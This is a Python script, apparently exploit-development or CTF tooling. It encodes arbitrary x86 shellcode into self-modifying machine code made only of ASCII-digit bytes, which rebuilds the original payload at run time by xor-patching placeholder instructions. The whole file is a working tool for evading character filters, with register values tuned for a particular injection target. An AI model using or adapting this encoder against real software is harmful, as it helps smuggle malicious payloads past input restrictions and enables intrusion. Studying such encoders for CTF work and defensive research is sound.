#!/usr/bin/env python3

import sys

# Register values the generator models for the moment the emitted code starts
# running. NOTE(review): presumably these match the target process state at
# entry -- confirm against the environment the payload is injected into.
EDX = 0xffffffff
EBX = 0x0804c000
EAX = 0x08080000

# Base address of the generated code; all page addresses are offsets from it.
CODE_START = EAX

# Second-lowest byte of EDX / EBX, i.e. the values of the dh / bh sub-registers.
DH = (EDX >> 8) & 0xff
BH = (EBX >> 8) & 0xff

# Maximum number of placeholder instructions patched and executed per 0x100 page.
INCR_PER_PAGE = 5
# Raw opcode bytes (opcode + ModRM) for the instructions named by each constant.
# CMP_DEREF_EAX_DH is also used as the two-byte filler emitted by pad().
CMP_DEREF_EAX_DH = [ 0x38, 0x30 ]
XOR_DEREF_EAX_DH = [ 0x30, 0x30 ]
XOR_DH_DEREF_EAX = [ 0x32, 0x30 ]
XOR_BH_DEREF_EAX = [ 0x32, 0x38 ]
# Opcode only; the caller appends the immediate operand byte(s).
XOR_AL_IMM8 = [ 0x34 ]
XOR_EAX_IMM32 = [ 0x35 ]

# Two-byte placeholders whose first byte is later xor-patched by the generated
# code itself, turning them into the "add" instructions noted on each line.
INCR_HI_PLACEHOLDER = [ 0x30, 0x30 ] # after: 00 30 -- add byte ptr [eax], dh
INCR_LO_PLACEHOLDER = [ 0x30, 0x38 ] # after: 00 38 -- add byte ptr [eax], bh

# Output buffer: list of byte values making up the generated code so far.
CODE = []

def error(s):
    """Print *s* prefixed with ``ERROR: `` and terminate the program.

    Raises:
        SystemExit: always, with exit code -1.
    """
    print("ERROR: " + s)
    # sys.exit is used instead of the bare ``exit`` helper: the latter is
    # injected by the ``site`` module for interactive sessions and is not
    # available when Python runs with -S or from a frozen build.
    sys.exit(-1)

def emit(*args):
    """Append every argument to the global CODE buffer.

    List arguments are spliced in element by element; any other argument is
    appended as a single entry.
    """
    for item in args:
        if not isinstance(item, list):
            CODE.append(item)
            continue
        # In-place extension keeps CODE the same list object.
        CODE.extend(item)

def pad(padlen):
    """Fill CODE with two-byte CMP_DEREF_EAX_DH filler up to *padlen* bytes.

    Aborts via error() when the current code length is odd or already
    exceeds *padlen*.
    """
    current = len(CODE)
    if current % 2:
        error("odd code len, cant pad")
    if padlen < current:
        error("padlen ahead of codelen (0x%x/0x%x)" % (padlen, current))
    # Each filler instruction occupies two bytes.
    filler_count = (padlen - current) // 2
    emit(CMP_DEREF_EAX_DH * filler_count)

def find_iters(want):
    """Find how to build byte *want* from a numeric start byte plus additions.

    Searches start bytes 0x30..0x39 and 0..15 additions each of the current
    DH and BH values (modulo 256).

    Returns:
        ``[startval, incr_hi, incr_lo]`` for the combination with the fewest
        total additions (the first one found on ties), or ``None`` when no
        combination produces *want*.
    """
    candidates = (
        [start, hi, lo]
        for start in range(0x30, 0x3a)
        for hi in range(16)
        for lo in range(16)
        if (start + hi * DH + lo * BH) & 0xff == want
    )
    # min() returns the first minimal element, matching a strict "<" update.
    return min(candidates, key=lambda cand: cand[1] + cand[2], default=None)

def xor_eax(v):
    """Return the bytes of ``xor eax, imm32`` with *v* as the immediate.

    The immediate is encoded as the four low bytes of *v*, least significant
    byte first.
    """
    immediate = [(v >> shift) & 0xff for shift in range(0, 32, 8)]
    return XOR_EAX_IMM32 + immediate

def incr_eax(old_value, new_value):
    """Build code that changes eax from *old_value* to *new_value*.

    The change is expressed as two ``xor eax, imm32`` instructions whose
    immediate bytes all lie in 0x30..0x39, optionally followed by
    ``xor al, 0x30``. The global EAX is set to *new_value* as a side effect,
    even when no encoding is found.

    Returns:
        The list of instruction bytes, or ``False`` when some byte of the
        required change cannot be produced by xor-ing two such immediates.
    """
    global EAX
    EAX = new_value

    # When bits 0x30 must be cleared from the low byte, aim for a value that
    # still has them set and strip them afterwards with "xor al, 0x30".
    fix_al = bool(old_value & 0x30) and not (new_value & 0x30)
    if fix_al:
        new_value |= 0x30

    first_imm = 0
    second_imm = 0
    for shift in range(0, 32, 8):
        # Bits that have to flip in this byte; a ^ b must equal them.
        delta = ((old_value >> shift) ^ (new_value >> shift)) & 0xff
        for a in range(0x30, 0x3a):
            b = a ^ delta
            if 0x30 <= b <= 0x39:
                first_imm |= a << shift
                second_imm |= b << shift
                break
        else:
            return False

    out = xor_eax(first_imm) + xor_eax(second_imm)
    if fix_al:
        out = out + XOR_AL_IMM8 + [0x30]
    return out

# Require exactly two arguments: the input shellcode and the output path.
if len(sys.argv) != 3:
    print("usage: %s <shellcode.bin> <output.bin>" % sys.argv[0])
    # sys.exit rather than the site-provided ``exit`` helper, which is only
    # guaranteed to exist in interactive sessions.
    sys.exit(0)

# Prologue: use the first code byte as scratch to load dh and bh with new
# values. The first emitted byte is 0x30 (opcode of XOR_DEREF_EAX_DH); the
# inline results assume eax points at that byte when the code starts
# (CODE_START == EAX) -- TODO confirm against the target.
emit(XOR_DEREF_EAX_DH) # *eax = 0xcf
emit(XOR_DH_DEREF_EAX) # dh = 0xff^0xcf == 0x30
emit(XOR_BH_DEREF_EAX) # bh = 0xc0^0xcf == 0x0f

# Mirror the same xor on the generator's model of dh/bh so that find_iters()
# later computes with the values the registers hold at run time.
tmp = 0x30 ^ DH
DH ^= tmp
BH ^= tmp

code_addr = EAX

# Move eax to the start of the first patch page (offset 0x100) and fill the
# remainder of page 0 with filler instructions.
emit(incr_eax(code_addr, code_addr + 0x100))
pad(0x100)

# Number of 0x100-byte patch pages needed to fix up all non-numeric bytes.
patch_page_cnt = 0

# Read the raw shellcode; the context manager closes the handle right away
# instead of leaving it to the garbage collector.
with open(sys.argv[1], "rb") as shellcode_file:
    shellcode_bytes = shellcode_file.read()

# final_page: numeric start byte emitted for every shellcode position.
# mutabytes: [startval, incr_hi, incr_lo, position] for each byte that must be
# adjusted at run time.
final_page = []
mutabytes = []

for pos, v in enumerate(shellcode_bytes):
    # Bytes that are already ASCII digits are emitted unchanged.
    if 0x30 <= v <= 0x39:
        final_page.append(v)
        continue
    r = find_iters(v)
    if r is None:
        error("could not find iter counts for value 0x%02x" % v)
    mutabytes.append(r + [pos])
    final_page.append(r[0])
    incr_cnt = r[1] + r[2]
    # Each page holds at most INCR_PER_PAGE additions: integer ceil division.
    patch_page_cnt += -(-incr_cnt // INCR_PER_PAGE)

print("[~] total patch pages: %d" % patch_page_cnt)

if patch_page_cnt > 0xe:
    error("too many patch pages (%d, max=14)" % patch_page_cnt)

def _emit_eax_move(dest):
    """Emit the xor sequence moving eax to *dest*; abort if none exists."""
    src = EAX  # incr_eax() overwrites the global, keep it for the message
    seq = incr_eax(src, dest)
    if seq is False:
        # Without this check the False value would be appended to CODE and
        # only surface later as a misleading "odd code len" error from pad().
        error("cannot move eax from 0x%08x to 0x%08x with numeric xor immediates"
              % (src, dest))
    emit(seq)


# Offset (from CODE_START) of the page holding the shellcode start bytes; it
# follows page 0 and all patch pages.
final_page_addr = 0x100 + (patch_page_cnt * 0x100)
page_addr = 0x100

for mutabyte in mutabytes:
    cnt_hi, cnt_lo, patch_offset = mutabyte[1:]

    # One placeholder per required addition: dh additions first, then bh.
    mutations = [INCR_HI_PLACEHOLDER] * cnt_hi
    mutations += [INCR_LO_PLACEHOLDER] * cnt_lo

    while mutations:
        cnt_in_page = min(len(mutations), INCR_PER_PAGE)

        # Point al at each placeholder slot (page offset 0x30 + 2*i), xor its
        # first byte with dh so it becomes an "add" opcode, then restore al.
        for i in range(cnt_in_page):
            slot = 0x30 + (i * 2)
            emit(XOR_AL_IMM8, slot)
            emit(XOR_DEREF_EAX_DH)
            emit(XOR_AL_IMM8, slot)

        # Aim eax at the shellcode byte to adjust, then place the placeholders
        # at the slot offsets patched above.
        _emit_eax_move(CODE_START + final_page_addr + patch_offset)
        pad(page_addr + 0x30)

        emit(*mutations[:cnt_in_page])
        del mutations[:cnt_in_page]

        # Return eax to the start of the next page and fill up this one.
        page_addr += 0x100
        _emit_eax_move(CODE_START + page_addr)
        pad(page_addr)

pad(final_page_addr)
CODE += final_page

# Write the generated code; the context manager closes the file even when the
# write raises.
with open(sys.argv[2], "wb") as fh:
    fh.write(bytes(CODE))

print("[>] wrote numeric shellcode to '%s'" % sys.argv[2])
if len(shellcode_bytes) > 0:
    print("[~] old length: %d bytes, new length %d (size increase %.2f%%)" % (
        len(shellcode_bytes), len(CODE),
        float(len(CODE)) / (float(len(shellcode_bytes)) / float(100))
    ))
else:
    # An empty input has no meaningful ratio; avoid dividing by zero.
    print("[~] old length: 0 bytes, new length %d" % len(CODE))
